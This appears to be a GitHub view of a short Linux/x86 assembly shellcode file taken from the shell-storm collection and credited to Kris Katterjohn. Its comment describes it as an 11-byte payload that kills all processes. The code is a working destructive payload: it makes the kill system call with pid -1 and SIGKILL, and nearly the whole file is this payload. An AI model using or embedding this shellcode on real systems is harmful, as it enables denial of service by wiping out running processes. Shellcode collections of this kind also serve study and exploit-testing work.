Permalink
Cannot retrieve contributors at this time
19 lines (13 sloc)
267 Bytes
|
; http://shell-storm.org/shellcode/files/shellcode-212.php |
|
; By Kris Katterjohn 11/13/2006 |
|
; 11 byte shellcode to kill all processes for Linux/x86 |
|
|
|
|
|
global _start |
|
|
|
section .text |
|
_start: |
|
|
|
push byte 37 |
|
pop eax |
|
push byte -1 |
|
pop ebx |
|
push byte 9 |
|
pop ecx |
|
int 0x80 |
|
|
|
|
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session.
You signed out in another tab or window. Reload to refresh your session.